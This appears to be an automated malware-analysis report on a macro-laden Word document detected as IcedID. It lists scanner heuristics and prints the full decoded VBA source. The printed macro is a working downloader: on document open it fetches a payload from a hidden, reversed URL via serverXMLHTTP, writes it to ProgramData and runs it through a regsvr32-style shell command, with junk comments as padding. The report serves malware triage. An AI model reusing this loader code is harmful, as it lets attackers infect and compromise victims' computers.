MALICIOUS
Risk Score: 230

Heuristics (6)

- ClamAV: Doc.Macro.ICEID1020-9781212-0 (critical, CLAMAV_DETECTION): ClamAV detected this file as malware: Doc.Macro.ICEID1020-9781212-0
- VBA project inside OOXML (medium, OOXML_VBA, 3 related findings): Document contains a VBA project, so VBA macros are present.
- CreateObject call (high, OLE_VBA_CREATEOBJ): CreateObject call. Matched line in script: `Set cDfrj = CreateObject("Script" + BGkvX)`
- VBA p-code auto-exec with execution tokens (high, OLE_VBA_PCODE_AUTOEXEC_EXEC): Triggers on the combination of two tokens co-occurring in the same compiled VBA/cache stream: an auto-execution entry point (Auto_Open / AutoOpen / Document_Open / Workbook_Open / Auto_Close / AutoClose) AND a shell/download/object-execution token (Shell, CreateObject, GetObject, PowerShell, cmd.exe, URLDownloadToFile, WinHttp, XMLHTTP, ADODB.Stream, ShellExecute, ExecuteExcel4Macro). Neither token alone fires it; it is the pairing that flags p-code-only or source-extraction-failure macro documents where the visible VBA source is unavailable. The matched tokens are named in the detail line below.
- AutoOpen macro (low, OLE_VBA_AUTOOPEN): AutoOpen macro. Matched line in script: `Sub AutoOpen()`
- Embedded URL (info, EMBEDDED_URL): One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL. Every URL extracted from this sample carried the label "In document text (OOXML body / shared strings)".
Extracted artifacts (2)
Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size | SHA-256 |
|---|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source from OOXML) | 11953 bytes | f55d8974d00d8d8ca7858a341b3fce2d76d698df0c0e8bf5ba4dcb9bdacf323f |

Preview script (first 1,000 lines of the extracted script):
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Name = "YJWeH"
Sub sfVeF(ETqev, Optional ByVal ouuCU As String = "c:\programdata\MYgcJ.txt", Optional ByVal BGkvX As String = "ing.FileSystemObject")
' Opinionated
' Reviser embrasure haughty suspect disbursement soughtafter
' Surfeit seaweed
' Semaphoring feelingly allotting apparelled
' Bitterness pasted mentors
' Fumaroles refocussing drizzled actor cresting deadens
' Determinant luxor disappointed inexactitude cackling
' Connectivity slenderest
' Null incredulous deformity scrutinies
' Cockatoo cactus raincloud
' Comedian epitaxial
' Bowing slept succinctness crumbs
' Crediting sputter mayor
' Materialist pimple
' Dyspeptic sociable autoignition
Set cDfrj = CreateObject("Script" + BGkvX)
' Uninhibitedly indicator understocked shunter consorts
' Negotiation aeronaut honourable wearing
' Gaits
' Yours alley iglu interdependent
' Preservationists archduke selfdestructive cheep arrestable lien
' Area proffer
Set clycy = cDfrj.CreateTextFile(ouuCU)
' Durables
' Fleetingly brat
' Irregularity stomping grieving discarded robin
' Duplicities nasally
clycy.WriteLine ETqev
' Dirtiness decelerated funicular
' Bioscope servicing
' Skyline
' Remunerated
' Crudely sanest ruminant hirings admen delhi
clycy.Close
' Sailors razzmatazz cavorts
' Negotiators takeovers glisten
' Sputum moors uninitiated attenuator ecclesiastically
' Crocus metaphysical dudgeon sheaf
' Sculptors realistic sodas
' Reunion moneys toymaker anyone
' Reformed sacramental consented implicitly developed professions
' Bearers beany ridiculing sailer crusading telltale
' Pickerels heliosphere shear
' Formulate
' Cosmetics back studios multinationals slur
' Spitefully glowing itself subnormal damascus asymmetric
' Vacuous singularly profligacy aztecs maggot dulcet
' Expenditure crossways jetlagged lexeme superscript herbicide
' Pioneered altercation
' Exfoliation pluses condenser egret infill
' Sleeved abjectly thumbprint flinty storming
' Spontaneous loosen
' Requiring glaciological reappointed comber deciphering ragged
' Practicality
' Absolve vitreous restorers sideshow
' Knowing perfunctorily
' Paracetamol lipstick ding
' Whoever
' Riboflavin drip untrusted divinely tidying uplifting
' Cartridges solely bangle crosschecking moorland
' Mnemonic hurray netball
' Positivism
' Ankara unreconciled
' Fingerprint succinct streakers
' Undone shrews jingled fleshless poky
' Cased embassies
' Greyish rule
' Xenophobia
' Centaur ruling rustiness affidavit debated
' Blockages justifiably
' Wellgrounded cinemas kinswoman offshoot
End Sub
' Duality redound scorning boded
' Steamer
' Skinless hailing rialto irking cog
' Slenderness carnivals infarctions cowards wasteful
' Folding programmable parliamentarian enlistment
Sub AutoOpen()
' Delirium sacked
' Mathematical tensest vehicle inheritances scalloped lymphomas
' Conciliate anorexia spaceships
' Dermatologist prosecutorial currencies spotters
' Crunching circumferences strong biotechnologist
' Prance evaluate
' Stymie lurker
' Flyover caliph amino
' Recouple dinars elongated
' Titan windowless
' Internationalists simplistically
' Vaguely recreating contemplation
' Girders underwent pinholes
' Foam restaurant carbuncle
' Projective
' Pipework linings
' Diacritics rurally
' Fissures unsmooth faceting
' Uncrackable glasses nutritive compressibility
' Bequeathed compressible ladylike sunrise globally
' Coolest
' Perfidiously harmonically oafish horsewhipped wring
' Remotely tweet soaker ambassadorial
' Doctor pluralists citizenship densest
' Rehabilitating alluded unconverted
' Liquidations distillery
' Diffracts judgment hustings
' Suggestion misunderstandings irruption
' Affectation collaborations hopped
Dim yvBzH As New JyFrJ
' Betel unavoidable
' Comprehends tanking
' Counterpoints dispenser acids
' Pentagon unavoidably barricades smartened
' Irresolute baste
' Distracted
' Trefoils shoals
ETqev = yvBzH.Ibgof("MSXML2.serverXMLHTTP")
' Cormorant obstinate unbar cautioned spaceships
' Unexploded contender
' Filigree tinting
' Permitting behavioural imperilled
' Reshuffled hat suicidally
sfVeF ZVToT(ETqev)
' Rescued
' Inkwells serves
' Bargepole unscratched dimming
' Expression save
' Reclaiming
' Raving conscript edits dosed misrepresentation
' Lumberjack tarsus roundtheclock closet
' Manpower crinkle
xHhFv orKrI(0) + "vr32 c:\programdata\MYgcJ.txt", "ws"
End Sub
Function dOcXQ(tYAtR, EGguq)
' Crofts pavements ostensible unfair imitator
' Igneous contemporaneity
' Muddiest
' Versions snobbery
' Effort dirtier replicator proves
' Slaughterings labyrinthine quiver ices intransitive embarrass overhaul
dOcXQ = Split(tYAtR, EGguq)
End Function
Attribute VB_Name = "XqpTk"
' Inappropriateness squeaky debars
' Fruitlessly
' Hoe smallpox publishable
' Constituting
' Dictionaries
Function ZVToT(bsYFo)
' Enlace barren rituals subprogram intractable
' Turncoats mispronunciation
' Infirmary stropping amiable mortal
' Interned sensibility unite
ZVToT = StrConv(bsYFo, vbUnicode)
' Overestimating
' Busman dredge exoticism mauler specialised
' Processors spirals possessives
' Vibrating
' Munch overseas womaniser restfulness
' Ells craziness housemaid clawing
End Function
' Partially debacle outflanked unstoppable
' Photocopied translate atlas
' Session animosities
' Breed subordinate commitment celestially
' Wended backwardness boorishly grandmaster
Function uXtke()
' Lowland procurement farthest hasty abstrusely
' Watchmakers presbytery requiem
' Wetter vertebral discovers cedilla
' Footstool dice westerner virtue foreseeable touched
' Locking bellicose
' Plaster dux plotters
' Marketing suffers april bloodshed
' Administrations europe addition workroom
' Ancestries triggering
' Remarkable lethargically sonora resignation
' Cosiest repacking thriller
With ActiveDocument.shapes(1)
uXtke = .AlternativeText
End With
End Function
' Reprovingly unmodifiable
' Benefactions oblique exporters
' Normal bandiest impeached recuperates
' Discarding chargeable brasiers
' Beauty valuation arithmetically
' Dissolution profited
Function orKrI(HoPuF)
' Las sufficed stumble travelogue
' Installations excerpt fraud layout
' Trappings petit
' Aped mockingbird thoughtlessness
' Unquenchable strum egomania gambling
' Musingly crucify resonator coincides evocatively
' Oh
' Connections grasps mimicked willpower begun
' Burdensome gulfs molluscan faeces
' Joked overripe rumour trustful intruders
' Layby bicker excel france
' Selling
' Bulkhead
' Recapitalisation servicemen
' Kleptomaniac roundabout breakfasting sandstone
LvQQE = uXtke()
PSbdd = dOcXQ(LvQQE, "###")
veIMu = PSbdd(HoPuF)
orKrI = veIMu
End Function
Attribute VB_Name = "JyFrJ"
Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = False
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Function Reverse(Text)
Dim i As Integer
Dim StrNew As String
Dim strOld As String
strOld = Trim(Text)
For i = 1 To Len(strOld)
StrNew = Mid(strOld, i, 1) & StrNew
Next i
Reverse = StrNew
End Function
' Plagiarised spout
' Braincell ungovernable
' Bumper playfulness soakings
' Parades sheikhs resound womb
' Placement incriminates compulsively
' Valhalla bombers misquotation institutionally
Function Ibgof(WGyWd)
' Password waterproof
' Hotair conveniences frisked rinsing
' Victors untactful marvellously
' Neurosis preserved echinoderm unceasingly
' Adorn
' Inventive removes yankees anthropocentric mussel
Dim yOYRw As Object
' Tertiaries pegged
' Unhealthy waters
' Typists
' Reintroduces conger carnation undue
' Overtones maoists hesitantly invective
' Angered
' Knock resumption tumescent
' Photocopying pleasing
' Dopamine leftwards bolivia
' Bauxite uncluttered
' Tainting tits clearly showjumpers participant beater sweeper
Set yOYRw = CreateObject(WGyWd)
' Absentmindedly mean stockbroker mournfulness
' Pizza pang recommending extinguisher copyists doormat artist overtax
' Sake arrowed waywardness albania editions lull
' Jewish
' Languages fiddling hearten
' Unkindness packing mistier modem trunking faking
' Unsteady
' Loanwords discernment mayflies
' Tuition coarser osmium
' Extralinguistic vagabonds
' Stroller urethrae
' Entertain barefoot noiseless
' Tiresomely freshman jesuit moments
' Prestige
' Infernally fictional reside
' Eyeteeth unworn unknightly
' Resubstitute
' Cognac unmaking
' Categorical destabilised besets commemorates blotched rediscovery
' Minimisation unchaining ladybug invades
' Jury
' Prevail harmfully miming
' Evens monarchical
' Borstal task roarer dialectics polarised untruthful
WIksp = orKrI(1)
' Promotion swoons microfiche ridiculousness
' Institutionalism mothered gymnastics
' Pillaging vulva vino ungodly sniggers
' Tidings reiterated
' Westernised nowhere injunctions
yOYRw.Open "GET", Reverse(WIksp), False
' Adventurers disobedient
' Duelling
' Imprint tinny severs boffin uproot dispersant
' Embarking brag ceremonious upbeat firefighters
yOYRw.Send
' Shoeing hurry vizier
' Fonts violating impedimenta masseuse crystallography punier
' Adduces popped neighing pedant evolved libeled
' Mobster trekker hesitantly
' Rookies burst garbs desks
Ibgof = yOYRw.responsebody
End Function
Attribute VB_Name = "kYuTd"
Sub xHhFv(hQnPh, iKMHC)
' Delineation centrifuges
' Bicarbonate shoddiness
' Stalwart lagoon
' Defender collecting winged intergalactic perspicuity geopolitical bacterial
' Uncoil concomitantly codify satirising
Set lSWzP = CreateObject(iKMHC + "cript.shell")
' Squelching bedouin acidify precociousness
' Discards bootlaces amounting venders
' Masquerades lozenge
' Lacklustre cherishing khoikhoi
' Sequoia alphabet ceremonious overturn
' Preparatory
' Orderless
' Augmented contorts unsurpassed submarine
' Incarceration fightback
' Mileages comings bonemeal
' Tessellated conjuring culpably
' Interfaces builds dermatological murder
' Signpost prematurely typing
' Tricksters deterred viva wrathfully
' Structuralists banner statistically wast
' Pondering classiest
' Redial grisly
' God stateless dishpan kicker
' Reciprocally forcibly ballbearings voucher
' Shuttling hornbeam wore replications
' Cower champions retreating adjudicating
' Emancipatory pallmall overrunning enslaved declarers
' Purlins dictionary
' Egocentric maximal editor budgetary liberalised perfume
' Doctorate swing teammate forbids
' Lamentable miraculousness
' Remainders sander unmistakeable camping
' Motivator
' Boxers
' Prayer incensing serpent
' Shoestring tobogganing litter
' Anger porpoise pulping gushes
' Combed apsis refillable head twiddler
' Beefier
' Goodly sibling yens worries
' Marinate superciliousness aquarium
' Mallard flagella pollarded pungency
' Subhuman
' Freshens payee asterisk
' Scooping hyperfine
' Contented fealty swim windscreens documentaries
' Perusing eluted
' Harrier rusticate morons deified sedately glitzy quells
' Crossexamines enterprises humbly shampooed
' Dais
' Oversubscribed strafe exhilarate catsuit polynomial
' Thrown
' Suggest characterise
lSWzP.exec hQnPh
' Concisely
' Shabbiest dactylic rasp atmospherics
' Outlay retral bowstring familial
' Accumulations
' Tarnished idyllically foster mincing parietal bobbed axed
' Quern meddlers enforceability fluid leech
End Sub

| Filename | Kind | Source | Size | SHA-256 |
|---|---|---|---|---|
| vbaProject_00.bin | vba-project | OOXML VBA project: word/vbaProject.bin | 45056 bytes | ab69bf33adb73696d318a0a92bef597ee68b41e978ae6fcf8705de3777c41744 |

Detection
ClamAV: Doc.Macro.ICEID1020-9781212-0
Obfuscation or payload: unlikely